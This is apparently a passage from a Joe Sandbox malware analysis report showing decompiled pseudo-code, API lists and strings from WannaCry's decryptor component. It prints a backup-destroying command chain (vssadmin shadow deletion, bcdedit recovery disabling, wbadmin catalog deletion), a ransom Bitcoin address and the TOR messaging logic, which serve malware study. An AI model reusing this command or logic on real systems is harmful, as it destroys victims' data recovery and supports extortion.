                                  																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                  																}
                                  																__eflags = 1;
                                  																if(1 != 0) {
                                  																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x10c) = _t204;
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                  																}
                                  																__eflags = _t276;
                                  																if(_t276 != 0) {
                                  																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                  																}
                                  															} else {
                                  																goto L60;
                                  															}
                                  															goto L69;
                                  														}
                                  														asm("sbb eax, eax");
                                  														asm("sbb eax, 0xffffffff");
                                  														goto L59;
                                  														L60:
                                  														_t341 = _t341 + 4;
                                  														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                  													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                  												}
                                  												L69:
                                  												__eflags = _t329;
                                  												if(_t329 != 0) {
                                  													_push(_t329);
                                  													L00412C98();
                                  													_t356 = _t356 + 4;
                                  												}
                                  												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                  												memcpy(_t182 + 8, _t346, 0x4b << 2);
                                  												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                  												__eflags = 0;
                                  												return 0;
                                  												goto L73;
                                  											}
                                  										} else {
                                  											_push(_t313);
                                  											L00412C98();
                                  											return 0x800;
                                  										}
                                  									} else {
                                  										return 0x800;
                                  									}
                                  								} else {
                                  									return 0x700;
                                  								}
                                  							} else {
                                  								goto L8;
                                  							}
                                  						} else {
                                  							if(_t312 == _t232) {
                                  								L8:
                                  								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                  								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                  								 *((char*)(_t226 + 4)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  							} else {
                                  								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L73:
                                  			}

                                  0x00412014
                                  0x0041201a
                                  0x0041201c
                                  0x00412024
                                  0x00412024
                                  0x00412026
                                  0x00412026
                                  0x00412035
                                  0x00412037
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412043
                                  0x00412047
                                  0x00412058
                                  0x0041205e
                                  0x00412063
                                  0x00412066
                                  0x00412074
                                  0x00412078
                                  0x0041207e
                                  0x00412082
                                  0x00412086
                                  0x0041208c
                                  0x00412092
                                  0x0041209c
                                  0x0041209e
                                  0x004120a4
                                  0x004120aa
                                  0x004120b0
                                  0x004121f2
                                  0x004120b6
                                  0x004120b6
                                  0x004120ba
                                  0x004120bf
                                  0x004120c6
                                  0x004120ca
                                  0x004120ce
                                  0x004120d3
                                  0x004120d7
                                  0x004120d7
                                  0x004120d9
                                  0x004120db
                                  0x004120dd
                                  0x00000000
                                  0x00000000
                                  0x004120df
                                  0x004120e1
                                  0x004120f7
                                  0x004120f7
                                  0x004120e3
                                  0x004120e3
                                  0x004120e6
                                  0x004120e8
                                  0x004120e8
                                  0x004120eb
                                  0x00000000
                                  0x004120ed
                                  0x004120ed
                                  0x004120f0
                                  0x004120f3
                                  0x004120f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004120f5
                                  0x004120eb
                                  0x00412100
                                  0x00412100
                                  0x00412102
                                  0x00412120
                                  0x00412124
                                  0x00412133
                                  0x00412136
                                  0x00412138
                                  0x0041213c
                                  0x00412150
                                  0x00412153
                                  0x0041215e
                                  0x00412161
                                  0x00412166
                                  0x0041216a
                                  0x00412170
                                  0x00412173
                                  0x00412173
                                  0x00412179
                                  0x0041217b
                                  0x0041218f
                                  0x00412192
                                  0x0041219d
                                  0x004121a0
                                  0x004121a5
                                  0x004121a9
                                  0x004121af
                                  0x004121b2
                                  0x004121b2
                                  0x004121b8
                                  0x004121ba
                                  0x004121e1
                                  0x004121e7
                                  0x004121ea
                                  0x004121ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412102
                                  0x004120fb
                                  0x004120fd
                                  0x00000000
                                  0x00412104
                                  0x0041210e
                                  0x00412115
                                  0x00412115
                                  0x00412119
                                  0x004121f6
                                  0x004121f6
                                  0x004121f8
                                  0x004121fa
                                  0x004121fb
                                  0x00412200
                                  0x00412200
                                  0x00412203
                                  0x00412214
                                  0x0041221f
                                  0x00412225
                                  0x0041222e
                                  0x00000000
                                  0x0041222e
                                  0x00411e83
                                  0x00411e83
                                  0x00411e84
                                  0x00411e9a
                                  0x00411e9a
                                  0x00411e47
                                  0x00411e53
                                  0x00411e53
                                  0x00411e1e
                                  0x00411e2a
                                  0x00411e2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411d37
                                  0x00411d39
                                  0x00411d5e
                                  0x00411d66
                                  0x00411d6d
                                  0x00411d71
                                  0x00411d74
                                  0x00411d7a
                                  0x00411d80
                                  0x00411d86
                                  0x00411d8c
                                  0x00411d92
                                  0x00411d98
                                  0x00411d9e
                                  0x00411da4
                                  0x00411daa
                                  0x00411db2
                                  0x00411d3b
                                  0x00411d57
                                  0x00411d57
                                  0x00411d39
                                  0x00411d35
                                  0x00411d16
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                  • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
                                  				void* __ebp;
                                  				signed int _t44;
                                  				void* _t45;
                                  				void* _t47;
                                  				signed int _t48;
                                  				signed int _t51;
                                  				signed int _t56;
                                  				signed int _t58;
                                  				signed int _t59;
                                  				void* _t60;
                                  				signed int _t65;
                                  				signed int _t90;
                                  				signed int _t91;
                                  				signed int _t104;
                                  				intOrPtr* _t106;
                                  				struct _IO_FILE* _t107;
                                  				signed int _t108;
                                  				void* _t111;
                                  				intOrPtr _t114;
                                  				void* _t115;
                                  				void* _t116;
                                  				void* _t118;
                                  				void* _t120;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413FCE);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t114;
                                  				_t115 = _t114 - 0x8c;
                                  				_t111 = __ecx;
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
                                  				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
                                  				if(_t44 > 0x3e8) {
                                  					_push(0x3e8);
                                  					_push(0);
                                  					_push(_t115 + 0x14);
                                  					L00412F6E();
                                  					_push(_t44);
                                  					 *((char*)(_t115 + 0xa8)) = 1;
                                  					L00412D9A();
                                  					 *((char*)(_t115 + 0xa4)) = 0;
                                  					L00412CC2();
                                  				}
                                  				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                  					_t106 = __imp__time;
                                  					_t45 =  *_t106(0);
                                  					_t90 =  *0x4218a8; // 0x0
                                  					_t116 = _t115 + 4;
                                  					__eflags = _t45 - _t90 - 0xb4;
                                  					if(_t45 - _t90 >= 0xb4) {
                                  						L13:
                                  						_t47 =  *_t106(0);
                                  						_t91 =  *0x4218a8; // 0x0
                                  						_t116 = _t116 + 4;
                                  						_t48 = _t47 - _t91;
                                  						__eflags = _t48 - 0xe10;
                                  						if(_t48 <= 0xe10) {
                                  							L9:
                                  							__eflags =  *0x4218ac - 3; // 0x0
                                  							if(__eflags < 0) {
                                  								L15:
                                  								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                  								memset(_t116 + 0x18, 0, 0x21 << 2);
                                  								_t51 = fopen("00000000.res", "rb"); // executed
                                  								_t107 = _t51;
                                  								_t118 = _t116 + 0x14;
                                  								__eflags = _t107;
                                  								if(_t107 != 0) {
                                  									fread(_t118 + 0x1c, 0x88, 1, _t107); // executed
                                  									fclose(_t107);
                                  									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                  									_push(0);
                                  									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                  									_push(_t118 + 0x38);
                                  									_push(_t111 + 0x5f0);
                                  									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                  									_t118 = _t118 + 0x30;
                                  									_t108 = _t56;
                                  									E0040C670();
                                  									_t58 =  *(_t118 + 0xb0);
                                  									__eflags = _t108;
                                  									if(_t108 < 0) {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											_push(0);
                                  											_push(0x30);
                                  											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                  											L00412CC8();
                                  										}
                                  									} else {
                                  										__eflags = _t58;
                                  										if(_t58 != 0) {
                                  											L00412CC8();
                                  											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                  											_t118 = _t118 + 4;
                                  											 *0x4218a8 = _t58;
                                  										}
                                  									}
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t108;
                                  								} else {
                                  									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                  									L00412CC2();
                                  									_t59 = _t51 | 0xffffffff;
                                  								}
                                  								L23:
                                  								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                  								return _t59;
                                  							}
                                  							__eflags =  *(_t116 + 0xb0);
                                  							if( *(_t116 + 0xb0) != 0) {
                                  								L00412DA6();
                                  								 *((char*)(_t116 + 0xa8)) = 2;
                                  								_t60 =  *_t106(0);
                                  								_t104 =  *0x4218a8; // 0x0
                                  								_t120 = _t116 + 4;
                                  								__eflags = 0x3d;
                                  								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                  								_push("You are sending too many mails! Please try again %d minutes later.");
                                  								_push(_t120 + 0x10);
                                  								L00412E00();
                                  								_t48 =  *(_t120 + 0x1c);
                                  								_t116 = _t120 + 0xc;
                                  								_push(0);
                                  								_push(0);
                                  								_push(_t48);
                                  								L00412CC8();
                                  								 *((char*)(_t116 + 0xa4)) = 0;
                                  								L00412CC2();
                                  							}
                                  							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                  							L00412CC2();
                                  							_t59 = _t48 | 0xffffffff;
                                  							goto L23;
                                  						}
                                  						 *0x4218ac = 0;
                                  						goto L15;
                                  					}
                                  					_t65 =  *0x4218ac; // 0x0
                                  					__eflags = _t65 - 3;
                                  					if(_t65 >= 3) {
                                  						goto L13;
                                  					}
                                  					_t48 = _t65 + 1;
                                  					__eflags = _t48;
                                  					 *0x4218ac = _t48;
                                  					goto L9;
                                  				}
                                  				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                  					_push(0);
                                  					_push(0);
                                  					_push("Too short message!");
                                  					L00412CC8();
                                  				}
                                  				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				_t59 = _t44 | 0xffffffff;
                                  				goto L23;
                                  			}



























                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Too short message!, xrefs: 0040834F
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  • 00000000.res, xrefs: 00408480
                                  • s.wnry, xrefs: 004084DD
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%


                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
                                  				char _v1032;
                                  				char _v1424;
                                  				void _v2256;
                                  				void _v2456;
                                  				void _v2707;
                                  				char _v2708;
                                  				intOrPtr _v2720;
                                  				short _v2724;
                                  				int _t48;
                                  				int _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t60;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				short _t70;
                                  				void* _t82;
                                  				char* _t87;
                                  				char* _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t98;
                                  				intOrPtr _t99;
                                  				intOrPtr _t100;
                                  				intOrPtr _t105;
                                  				char _t122;
                                  				intOrPtr _t134;
                                  				intOrPtr _t135;
                                  				intOrPtr _t136;
                                  				intOrPtr* _t140;
                                  				intOrPtr* _t141;
                                  				intOrPtr* _t142;
                                  				intOrPtr* _t161;
                                  				intOrPtr* _t162;
                                  				intOrPtr* _t163;
                                  				void* _t165;
                                  				void* _t167;
                                  				intOrPtr* _t168;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t201;
                                  
                                  				_t201 = __fp0;
                                  				_t90 = __ecx; // executed
                                  				L00412CB0(); // executed
                                  				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                  				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                  				_t48 = E00401C70(0);
                                  				_t170 = _t169 + 4;
                                  				if(_t48 == 0) {
                                  					_t122 =  *0x421798; // 0x0
                                  					_v2708 = _t122;
                                  					memset( &_v2707, _t48, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetModuleFileNameA(0,  &_v2708, 0x104);
                                  					_t87 = strrchr( &_v2708, 0x5c);
                                  					_t170 = _t170 + 0x14;
                                  					if(_t87 != 0) {
                                  						_t89 = strrchr( &_v2708, 0x5c);
                                  						_t170 = _t170 + 8;
                                  						 *_t89 = 0;
                                  					}
                                  					SetCurrentDirectoryA( &_v2708);
                                  				}
                                  				_t167 = _t90 + 0x50c;
                                  				_t49 = E00401A10(_t167, 1);
                                  				_t171 = _t170 + 8;
                                  				if(_t49 == 0) {
                                  					memset(_t167, _t49, 0xc3 << 2);
                                  					asm("repne scasb");
                                  					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                  					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                  					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                  					 *(_t90 + 0x588) = 0;
                                  					__imp__time(0);
                                  					 *(_t90 + 0x578) = _t82;
                                  					E00401A10(_t167, 0);
                                  					_t171 = _t171 + 0x30;
                                  				}
                                  				_t50 = E00402C40();
                                  				__imp__#115(0x202,  &_v1424); // executed
                                  				__imp____p___argc();
                                  				if( *_t50 > 1) {
                                  					_t168 = __imp____p___argv;
                                  					_t140 = "fi";
                                  					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  					while(1) {
                                  						_t98 =  *_t161;
                                  						_t60 = _t98;
                                  						if(_t98 !=  *_t140) {
                                  							break;
                                  						}
                                  						if(_t60 == 0) {
                                  							L12:
                                  							_t60 = 0;
                                  						} else {
                                  							_t136 =  *((intOrPtr*)(_t161 + 1));
                                  							_t22 = _t140 + 1; // 0x31000069
                                  							_t60 = _t136;
                                  							if(_t136 !=  *_t22) {
                                  								break;
                                  							} else {
                                  								_t161 = _t161 + 2;
                                  								_t140 = _t140 + 2;
                                  								if(_t60 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L12;
                                  								}
                                  							}
                                  						}
                                  						L14:
                                  						if(_t60 == 0) {
                                  							E00407F80(_t90);
                                  							ExitProcess(0);
                                  						}
                                  						_t141 = "co";
                                  						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  						while(1) {
                                  							_t99 =  *_t162;
                                  							_t63 = _t99;
                                  							if(_t99 !=  *_t141) {
                                  								break;
                                  							}
                                  							if(_t63 == 0) {
                                  								L21:
                                  								_t63 = 0;
                                  							} else {
                                  								_t135 =  *((intOrPtr*)(_t162 + 1));
                                  								_t25 = _t141 + 1; // 0x6600006f
                                  								_t63 = _t135;
                                  								if(_t135 !=  *_t25) {
                                  									break;
                                  								} else {
                                  									_t162 = _t162 + 2;
                                  									_t141 = _t141 + 2;
                                  									if(_t63 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L21;
                                  									}
                                  								}
                                  							}
                                  							L23:
                                  							if(_t63 == 0) {
                                  								E004080C0(_t90);
                                  								ExitProcess(0);
                                  							}
                                  							_t142 = "vs";
                                  							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                  							while(1) {
                                  								_t100 =  *_t163;
                                  								_t66 = _t100;
                                  								if(_t100 !=  *_t142) {
                                  									break;
                                  								}
                                  								if(_t66 == 0) {
                                  									L30:
                                  									_t66 = 0;
                                  								} else {
                                  									_t134 =  *((intOrPtr*)(_t163 + 1));
                                  									_t28 = _t142 + 1; // 0x63000073
                                  									_t66 = _t134;
                                  									if(_t134 !=  *_t28) {
                                  										break;
                                  									} else {
                                  										_t163 = _t163 + 2;
                                  										_t142 = _t142 + 2;
                                  										if(_t66 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L30;
                                  										}
                                  									}
                                  								}
                                  								L32:
                                  								if(_t66 == 0) {
                                  									Sleep(0x2710);
                                  									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                  									_t70 = "cmd.exe"; // 0x2e646d63
                                  									_t105 =  *0x420fd4; // 0x657865
                                  									_v2724 = _t70;
                                  									_v2720 = _t105;
                                  									if(E00401BB0() != 0) {
                                  										_push( &_v2456);
                                  										_push( &_v2724);
                                  										sprintf( &_v1032, "%s %s");
                                  										E00401A90( &_v1032, 0, 0);
                                  									} else {
                                  										E00401B50( &_v2724,  &_v2456, _t71);
                                  									}
                                  									ExitProcess(0);
                                  								}
                                  								goto L37;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L32;
                                  						}
                                  						asm("sbb eax, eax");
                                  						asm("sbb eax, 0xffffffff");
                                  						goto L23;
                                  					}
                                  					asm("sbb eax, eax");
                                  					asm("sbb eax, 0xffffffff");
                                  					goto L14;
                                  				}
                                  				L37:
                                  				E00407E80();
                                  				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
                                  				E00406F80(_t90, _t201);
                                  				E00406C20(_t90);
                                  				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
                                  				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
                                  				 *0x42189c = _t90;
                                  				return 1;
                                  			}

                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNEL32(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  • cmd.exe, xrefs: 0040671C
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • %s %s, xrefs: 00406764
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%


                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v44;
                                  				struct HINSTANCE__* _t82;
                                  				struct HICON__* _t83;
                                  				intOrPtr _t119;
                                  				intOrPtr _t124;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E0B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t124;
